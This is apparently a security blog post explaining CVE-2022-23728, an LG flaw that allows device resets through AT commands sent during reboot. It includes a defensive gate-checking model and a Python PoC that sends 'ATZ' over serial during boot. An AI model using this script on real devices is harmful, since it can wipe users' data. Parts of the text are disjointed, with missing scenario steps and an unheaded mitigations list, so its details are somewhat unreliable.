In early 2022, security researchers discovered a critical vulnerability in certain LG smart mobile devices, tracked as CVE-2022-23728 and referenced as LVE-SMP-210011 by LG. This issue could allow an attacker to remotely reset the device during the reboot process using malicious AT commands. In this in-depth post, we'll break down the vulnerability, explain how it works in simple terms, show a proof-of-concept exploit, and point out the risks and mitigations.

What is an AT Command?

AT commands are instructions used to control modems. While mostly associated with older communication hardware, many modern devices (like LG smartphones) still support AT commands internally for tasks like troubleshooting, testing, or specific operations.

What is CVE-2022-23728?

CVE-2022-23728 is a software vulnerability in multiple LG device models. It allows an unauthorized user to send an AT command during the device's reboot process. Due to a security oversight, these commands aren't properly filtered or authenticated at this stage. As a result, a malicious actor with minimal access (for example, through a debugging interface or an open connection over USB) could reset the device — potentially triggering a factory reset, data wipe, or denial of service.

How Does It Work?

When an LG device starts up (boots up), it listens for AT commands coming from interfaces like USB or UART (a serial communication port). In a typical secure setup, the device would either block these commands or require privilege checks. But due to this bug, certain AT commands are *not* properly handled during the sensitive reboot window.

This means that, if an attacker has physical access or connected debugging access, they can issue a reset command when the device is rebooting.
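The check a secure setup would perform, sketched as an added example (it is not LG's firmware code and not part of the original post): a dispatcher gate that consults boot phase and caller privilege, next to one that does not. The `Phase` states, the gate functions and the grouping of Hayes commands into read-only and destructive sets are assumptions made for the illustration.

```python
from enum import Enum

class Phase(Enum):
    BOOTING = "booting"
    RUNNING = "running"

# Hayes commands used in this model: AT (attention), ATI (identify),
# ATZ (reset), AT&F (restore factory defaults). The grouping is an assumption.
READ_ONLY = {"AT", "ATI"}
DESTRUCTIVE = {"ATZ", "AT&F"}

def normalize(raw: bytes) -> str:
    """Canonical command name: trimmed, upper-cased, parameters dropped."""
    text = raw.decode("ascii", errors="replace").strip().upper()
    for sep in ("=", "?"):
        text = text.split(sep, 1)[0]
    return text

def vulnerable_gate(raw: bytes, phase: Phase, authenticated: bool) -> bool:
    """The flaw as described: neither the boot phase nor the caller's
    privilege is consulted before a known command is dispatched."""
    return normalize(raw) in READ_ONLY | DESTRUCTIVE

def hardened_gate(raw: bytes, phase: Phase, authenticated: bool) -> bool:
    """Fail closed: allowlist first, then phase, then privilege."""
    name = normalize(raw)
    if name not in READ_ONLY | DESTRUCTIVE:
        return False              # unknown or malformed input is dropped
    if phase is Phase.BOOTING:
        return False              # nothing is accepted mid-reboot
    if name in DESTRUCTIVE:
        return authenticated      # state changes require privilege
    return True

def newly_blocked(trace):
    """Entries the vulnerable gate dispatches but the hardened gate refuses."""
    return [(phase.value, normalize(raw))
            for phase, auth, raw in trace
            if vulnerable_gate(raw, phase, auth)
            and not hardened_gate(raw, phase, auth)]

# Constructed sample trace: (phase, authenticated, bytes seen on the port).
TRACE = [
    (Phase.BOOTING, False, b"ATZ\r\n"),
    (Phase.BOOTING, False, b"ATI\r\n"),
    (Phase.RUNNING, False, b"ATI\r\n"),
    (Phase.RUNNING, False, b"at&f\r\n"),
    (Phase.RUNNING, True, b"ATZ\r\n"),
]
```

Running `newly_blocked(TRACE)` lists the three requests that only the hardened gate refuses: both boot-time commands and the unauthenticated factory-defaults request.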

Proof-of-Concept Code

Below is a *simple* demonstration using Python and the PySerial library, showing how an attacker (with a USB-to-serial adapter or similar access) could issue an AT command to reset the device. This assumes the attacker can reach the device's serial interface during boot.

```python
import serial
import time

# Replace with the appropriate serial port for the LG device
SERIAL_PORT = '/dev/ttyUSB'  # Example port, may vary by system
BAUD_RATE = 115200

# Standard AT command to reset (may vary for device)
AT_RESET_COMMAND = 'ATZ\r\n'

def send_at_command_during_reboot():
    # Connect to serial port
    try:
        with serial.Serial(SERIAL_PORT, BAUD_RATE, timeout=1) as ser:
            print("[*] Waiting for device to begin reboot...")
            time.sleep(5)  # Adjust timing to match reboot window

            print(f"[*] Sending reset AT command: {AT_RESET_COMMAND.strip()}")
            ser.write(AT_RESET_COMMAND.encode())

            # Optionally, read response
            response = ser.read(64)
            print("[*] Device responded:", response)
    except Exception as e:
        print("[!] Serial communication failed:", str(e))

if __name__ == '__main__':
    send_at_command_during_reboot()
```

- The critical moment is during *reboot*. If the window is missed, the command may fail or be ignored.

- The attacker needs only basic access (USB/debug/UART).

Attack Scenario

1. The attacker gains short-term access to the device (USB debugging, maintenance port, or inside a supply chain).

- The device may be factory reset, wiping all user data.

- Recurring resets could cause denial of service (device stuck in boot/reset loop).

References

- LG Security Advisory: LVE-SMP-210011
- CVE Listing: CVE-2022-23728 - NVD
- AT Command Set Reference: Wikipedia - AT Command

- Update Firmware: Always install the latest updates from LG, which patch this vulnerability.

- Restrict Debug Ports: Disable unnecessary interfaces (UART, USB debugging), especially on production devices.

Conclusion

CVE-2022-23728 (LVE-SMP-210011) proves how even legacy features like AT command processing can become critical security holes if not carefully monitored during every stage of device operation. The attack described here is simple but effective, showing that attackers don't always need advanced exploits to cause real harm — sometimes all it takes is a forgotten command and the right timing. Stay updated, and lock down your hardware interfaces!

Stay Secure!

For more information, always check the official LG security bulletins and the National Vulnerability Database.

Timeline

Published on: 01/21/2022 19:15:00 UTC
Last modified on: 07/11/2022 17:39:00 UTC